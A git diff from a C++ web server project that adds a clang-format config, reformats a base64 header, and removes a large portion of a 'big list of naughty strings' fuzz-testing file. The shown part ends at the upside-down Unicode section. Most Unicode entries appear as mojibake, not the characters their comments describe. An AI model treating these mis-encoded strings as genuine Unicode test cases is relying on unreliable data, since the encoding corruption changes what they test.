-rw-r--r-- | .clang-format | 90 | ||||
-rw-r--r-- | include/base64.hpp | 5 | ||||
-rw-r--r-- | include/big_list_of_naughty_strings.hpp | 1149 | ||||
-rw-r--r-- | include/color_cout_g3_sink.hpp | 41 | ||||
-rw-r--r-- | include/crow_g3_logger.hpp | 116 | ||||
-rw-r--r-- | include/ssl_key_handler.hpp | 274 | ||||
-rw-r--r-- | include/token_authorization_middleware.hpp | 24 | ||||
-rw-r--r-- | include/webassets.hpp | 14 | ||||
-rw-r--r-- | src/base64.cpp | 143 | ||||
-rw-r--r-- | src/base64_test.cpp | 92 | ||||
-rw-r--r-- | src/token_authorization_middleware.cpp | 79 | ||||
-rw-r--r-- | src/token_authorization_middleware_test.cpp | 36 | ||||
-rw-r--r-- | src/webserver_main.cpp | 30 |
13 files changed, 947 insertions, 1146 deletions
diff --git a/.clang-format b/.clang-format
new file mode 100644
index 0000000000..4479e2d9d0
--- /dev/null
+++ b/.clang-format
@@ -0,0 +1,90 @@ +--- +Language: Cpp +# BasedOnStyle: Google +AccessModifierOffset: -1 +AlignAfterOpenBracket: Align +AlignConsecutiveAssignments: false +AlignConsecutiveDeclarations: false +AlignEscapedNewlinesLeft: true +AlignOperands: true +AlignTrailingComments: true +AllowAllParametersOfDeclarationOnNextLine: true +AllowShortBlocksOnASingleLine: false +AllowShortCaseLabelsOnASingleLine: false +AllowShortFunctionsOnASingleLine: All +AllowShortIfStatementsOnASingleLine: true +AllowShortLoopsOnASingleLine: true +AlwaysBreakAfterDefinitionReturnType: None +AlwaysBreakAfterReturnType: None +AlwaysBreakBeforeMultilineStrings: true +AlwaysBreakTemplateDeclarations: true +BinPackArguments: true +BinPackParameters: true +BraceWrapping: + AfterClass: false + AfterControlStatement: false + AfterEnum: false + AfterFunction: false + AfterNamespace: false + AfterObjCDeclaration: false + AfterStruct: false + AfterUnion: false + BeforeCatch: false + BeforeElse: false + IndentBraces: false +BreakBeforeBinaryOperators: None +BreakBeforeBraces: Attach +BreakBeforeTernaryOperators: true +BreakConstructorInitializersBeforeComma: false +ColumnLimit: 160 +CommentPragmas: '^ IWYU pragma:' +ConstructorInitializerAllOnOneLineOrOnePerLine: true +ConstructorInitializerIndentWidth: 4 +ContinuationIndentWidth: 4 +Cpp11BracedListStyle: true +DerivePointerAlignment: true +DisableFormat: false +ExperimentalAutoDetectBinPacking: false +ForEachMacros: [ foreach, Q_FOREACH, BOOST_FOREACH ] +IncludeCategories: + - Regex: '^<.*\.h>' + Priority: 1 + - Regex: '^<.*' + Priority: 2 + - Regex: '.*' + Priority: 3 +IndentCaseLabels: true +IndentWidth: 2 +IndentWrappedFunctionNames: false +KeepEmptyLinesAtTheStartOfBlocks: false +MacroBlockBegin: '' +MacroBlockEnd: '' +MaxEmptyLinesToKeep: 1 +NamespaceIndentation: None +ObjCBlockIndentWidth: 2 +ObjCSpaceAfterProperty: false +ObjCSpaceBeforeProtocolList: false +PenaltyBreakBeforeFirstCallParameter: 1 +PenaltyBreakComment: 300 +PenaltyBreakFirstLessLess: 
120 +PenaltyBreakString: 1000 +PenaltyExcessCharacter: 1000000 +PenaltyReturnTypeOnItsOwnLine: 200 +PointerAlignment: Left +ReflowComments: true +SortIncludes: true +SpaceAfterCStyleCast: false +SpaceBeforeAssignmentOperators: true +SpaceBeforeParens: ControlStatements +SpaceInEmptyParentheses: false +SpacesBeforeTrailingComments: 2 +SpacesInAngles: false +SpacesInContainerLiterals: true +SpacesInCStyleCastParentheses: false +SpacesInParentheses: false +SpacesInSquareBrackets: false +Standard: Auto +TabWidth: 8 +UseTab: Never +... + diff --git a/include/base64.hpp b/include/base64.hpp index f5ff338cae..e024d0a48f 100644 --- a/include/base64.hpp +++ b/include/base64.hpp @@ -3,7 +3,6 @@ namespace base64 { - bool base64_encode(const gsl::cstring_span<> &input, std::string &output); - bool base64_decode(const gsl::cstring_span<> &input, std::string &output); - +bool base64_encode(const gsl::cstring_span<> &input, std::string &output); +bool base64_decode(const gsl::cstring_span<> &input, std::string &output); }
\ No newline at end of file
diff --git a/include/big_list_of_naughty_strings.hpp b/include/big_list_of_naughty_strings.hpp
index 4ba27f73e4..2d1ca0dd74 100644
--- a/include/big_list_of_naughty_strings.hpp
+++ b/include/big_list_of_naughty_strings.hpp
@@ -1,687 +1,464 @@ const std::string naughty_strings[] = { -// sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt - -// Reserved Strings -// -// Strings which may be used elsewhere in code - -"undefined", -"undef", -"null", -"NULL", -"(null)", -"nil", -"NIL", -"true", -"false", -"True", -"False", -"TRUE", -"FALSE", -"None", -"hasOwnProperty", -"\\", -"\\\\", - -// Numeric Strings -// -// Strings which can be interpreted as numeric - -"0", -"1", -"1.00", -"$1.00", -"1/2", -"1E2", -"1E02", -"1E+02", -"-1", -"-1.00", -"-$1.00", -"-1/2", -"-1E2", -"-1E02", -"-1E+02", -"1/0", -"0/0", -"-2147483648/-1", -"-9223372036854775808/-1", -"-0", -"-0.0", -"+0", -"+0.0", -"0.00", -"0..0", -".", -"0.0.0", -"0,00", -"0,,0", -",", -"0,0,0", -"0.0/0", -"1.0/0.0", -"0.0/0.0", -"1,0/0,0", -"0,0/0,0", -"--1", -"-", -"-.", -"-,", -"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", -"NaN", -"Infinity", -"-Infinity", -"INF", -"1#INF", -"-1#IND", -"1#QNAN", -"1#SNAN", -"1#IND", -"0x0", -"0xffffffff", -"0xffffffffffffffff", -"0xabad1dea", -"123456789012345678901234567890123456789", -"1,000.00", -"1 000.00", -"1'000.00", -"1,000,000.00", -"1 000 000.00", -"1'000'000.00", -"1.000,00", -"1 000,00", -"1'000,00", -"1.000.000,00", -"1 000 000,00", -"1'000'000,00", -"01000", -"08", -"09", -"2.2250738585072011e-308", - -// Special Characters -// -// ASCII punctuation. All of these characters may need to be escaped in some -// contexts. Divided into three groups based on (US-layout) keyboard position. - -",./;'[]\\-=", -"<>?:\"{}|_+", -"!@#$%^&*()`~", - -// Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, -// and U+007F (DEL) -// Often forbidden to appear in various text-based file formats (e.g. XML), -// or reused for internal delimiters on the theory that they should never -// appear in input. -// The next line may appear to be blank or mojibake in some viewers. 
-"", - -// Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. -// Commonly misinterpreted as additional graphic characters. -// The next line may appear to be blank, mojibake, or dingbats in some viewers. -"ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", - -// Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode -// version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), -// and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often -// treated as whitespace in some contexts. -// This file unfortunately cannot express strings containing -// U+0000, U+000A, or U+000D (NUL, LF, CR). -// The next line may appear to be blank or mojibake in some viewers. -// The next line may be flagged for \"trailing whitespace\" in some viewers. -" "," ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", - -// Unicode additional control characters: all of the characters with -// general category Cf (in Unicode 8.0.0). -// The next line may appear to be blank or mojibake in some viewers. -"ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠタᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ", - -// \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. -// The next two lines may appear to be blank or mojibake in some viewers. -"ᄏ", -"ᄒ", - -// Unicode Symbols -// -// Strings which contain common unicode symbols (e.g. 
smart quotes) - -"ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", -"ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", -"ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", -"ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", -"ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", -"ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", -"ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", -"`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", -"¬ナロ¬ナワ¬ナン¬ナ゙", -"チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフヘホマ", -"ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", - -// Unicode Subscript/Superscript/Accents -// -// Strings which contain unicode subscripts/superscripts; can cause rendering issues - -"¬チᄚ¬チᄡ¬チᄉ", -"¬ツタ¬ツチ¬ツツ", -"¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", -"¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", - -// Quotation Marks -// -// Strings which contain misplaced quotation marks; can cause encoding errors - -"'", -"\"", -"''", -"\"\"", -"'\"'", -"\"''''\"'\"", -"\"'\"'\"''''\"", -"<foo val=¬タワbar¬タン />", -"<foo val=¬タワbar¬タン />", -"<foo val=¬タンbar¬タワ />", -"<foo val=`bar' />", - -// Two-Byte Characters -// -// Strings which contain two-byte characters: can cause rendering issues or character-length issues - -"ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", -" ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", -"¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", -"←テᄄ│ミᄑ₩ᅠᄐ", -"↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", -"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ →リᅠ→ᄚᄅ↑ᄚチ■ユリ", 
-"ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", -"↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", -"ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", - -// Changing length when lowercased -// -// Characters which increase in length (2 to 3 bytes) when lowercased -// Credit: https://twitter.com/jifa/status/625776454479970304 - -"ᄎ", -"ᄒ", - -// Japanese Emoticons -// -// Strings which consists of Japanese-style emoticons which are popular on the web - -" ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", -"(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", -"ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", -"__ᄒロ(,_,*)", -" ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", -"ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", -", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", -"(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", -"(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", -"¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", -"( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", - -// Emoji -// -// Strings which contain Emoji; should be the same behavior as two-byte characters, but not always - -"゚リヘ", -"゚ムᄅ゚マᄑ", -"゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", -"゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", -"¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ ゚メル", -"¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", -"゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", -"0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ ゚ヤ゚", - -// Regional Indicator Symbols -// -// Regional Indicator Symbols can be displayed differently across -// fonts, and have a number of special behaviors - -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", -"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", - -// Unicode Numbers -// -// Strings which contain unicode numbers; if the code is localized, it should see the input as numeric - -"ᄐムᄐメᄐモ", -"ᄀᄁᆪ", - -// Right-To-Left Strings -// -// Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) - -"ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. 
ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", -"ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", -"ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", -"ᄋᄑ", -"ᄋᄎ", -"ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", - -// Trick Unicode -// -// Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) - -"¬タᆰ¬タᆰtest¬タᆰ", -"¬タᆱtest¬タᆱ", -"¬タᄅtest¬タᄅ", -"test¬チᅠtest¬タᆱ", -"¬チᆭtest¬チᄃ", - -// Zalgo Text -// -// Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) - -"£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", -"ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ.ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", -"ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", -"ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", -"Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", - -// Unicode Upsidedown -// 
